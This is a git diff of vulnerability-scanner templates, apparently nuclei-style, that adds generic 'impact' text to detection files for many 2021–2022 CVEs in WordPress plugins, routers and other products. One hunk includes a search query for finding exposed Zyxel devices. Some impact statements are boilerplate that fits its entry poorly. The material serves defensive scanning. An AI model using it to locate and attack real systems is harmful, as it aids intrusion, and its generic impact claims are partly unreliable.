+++ b/http/cves/2021/CVE-2021-45967.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability. + impact: | + The vulnerability can result in unauthorized access to sensitive data or systems, potentially leading to further exploitation or compromise. remediation: | Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967). reference: 
diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 65b3b6e38a..fafcce943c 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability. + impact: | + The vulnerability can be exploited by an attacker to gain unauthorized access to sensitive information, execute arbitrary code, or perform other malicious activities. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS. reference: diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index dc9d53e008..aab404397f 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index b6d8d3cbf5..5e5d54c227 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 24e4deac39..3154eb92e7 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index b30da81d27..f52a745148 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: 
diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 736f0a24e1..2698242bee 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Service List section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index e1b46b8cd4..62478c5c12 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index 488ee43d2e..f45224cc71 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. + impact: | + The impact of this vulnerability is significant as it can result in unauthorized access to sensitive data or systems. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 38e192dc21..1ad2fa83ef 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest firmware update provided by D-Link to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 4ef1d7df94..113c2eb454 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network. remediation: | Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index df42c29812..34facc0682 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: medium description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 7abb32283b..a8f10b7da2 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 0e244d0f7f..7fe65ce4e5 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 81b42b9952..7ea4c0335e 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. + impact: | + Successful exploitation could lead to loss of critical data or system instability. remediation: | Apply the latest patch or update provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 718396095d..580ae064a3 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of GenieACS or apply the necessary security patches to mitigate the vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 655226b815..9010e3736f 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 6b251edaf7..8d87aed2ab 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Cookie Information/Free GDPR Consent Solution plugin (2.0.8 or higher) to mitigate this vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index 4f6a267a8b..21cee2100b 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index baddf9d36f..445637f16a 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index 9127f5726f..9aef91c50d 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or defacement of the affected WordPress website. remediation: | Update to WordPress Accessibility Helper version 0.6.0.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index 7e67e03d78..eaa1020e45 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: medium description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. remediation: | Update to the latest version of KingComposer (>=2.9.7) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index ebbe09c335..9bf97cd21e 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: This is resolved in release 1.6.0. reference: - https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index bc46b2f168..20ea81babc 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting. + impact: | + An attacker with authenticated access can inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update WordPress RSS Aggregator plugin to version 4.20 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index b498c6d3b8..7e376ff46a 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 5f96ef9dd5..57ee40432e 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress NewStatPress plugin before 1.3.6 is susceptible to cross-site scripting. The plugin does not properly escape the whatX parameters before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.3.6. reference: - https://wpscan.com/vulnerability/ce12437a-d440-4c4a-9247-95a8f39d00b9 diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index 7cdc2ce04f..89bbdc5dca 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 2a2255bd12..4d342771a8 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WorsPress Spider Calendar plugin through 1.5.65 is susceptible to cross-site scripting. The plugin does not sanitize and escape the callback parameter before outputting it back in the page via the window AJAX action, available to both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress Spider Calendar plugin (>=1.5.66) or apply the vendor-supplied patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index fd64c0d284..d21f50bce0 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml 
@@ -5,6 +5,8 @@ info: author: hexcat severity: medium description: WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint. + impact: | + An attacker can exploit this vulnerability to inject malicious scripts into the subject field of an email template, potentially leading to unauthorized access, data theft, or further compromise of the affected system. remediation: | Update to version 3.1 or later of the HTML Email Template Designer plugin to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index e60e7817f2..d4a4fa7338 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users. reference: - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059 diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index dd7ca01825..251e53c347 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WOOCS plugin before 1.3.7.5 is susceptible to cross-site scripting. The plugin does not sanitize and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action, available to both unauthenticated and authenticated users, before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the WordPress WOOCS plugin to version 1.3.7.5 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index a91f6d4685..81cd2e6247 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade LearnPress to version 4.1.6 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index cdc399aafb..a9dc706611 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. + impact: | + Successful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information. remediation: | Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281). reference: diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 59ccc4121a..8092099116 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing attackers to execute malicious scripts in the context of the victim's browser. remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index cf0bc52b82..05fbf975d2 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml 
@@ -5,13 +5,13 @@ info: author: SleepingBag945,Powerexploit severity: critical description: | - An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. + An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. reference: - https://github.com/gobysec/GobyVuls/blob/master/CVE-2022-0342.md - https://nvd.nist.gov/vuln/detail/CVE-2022-0342 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1" tags: cve,cve2022,zyxel,auth-bypass,router diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 5f0345c088..31708457f8 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code on the affected system or inject malicious scripts into web pages viewed by users. remediation: | Update the WordPress XML Sitemap Generator for Google plugin to version 2.0.4 or later to mitigate the XSS and RCE vulnerabilities. reference: diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 264b477420..a00662df88 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Update to the latest version of the WordPress NotificationX plugin (2.3.9 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 5507b7f9ce..72b69a65fa 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a version that has addressed the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index bb22e2e1af..f4f0e5f703 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Embed Swagger plugin 1.0.0 and prior contains a reflected cross-site scripting vulnerability due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file, which allows attackers to inject arbitrary web scripts onto the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Embed Swagger plugin (1.0.0) or apply a patch provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 5f6fc921df..8d8862e290 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the TI WooCommerce Wishlist plugin (1.40.1 or higher). reference: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 207b99b64d..d50fffad3b 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: Fixed in version 0.12.6. reference: - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284 diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 986bbb9ee5..dda9fa6013 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 8dc3b1c1fe..4ea97c5dba 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability. + impact: | + Remote code execution remediation: | Apply the latest security patches and updates provided by the Mastodon project to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 1640243c18..ace30701b5 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml 
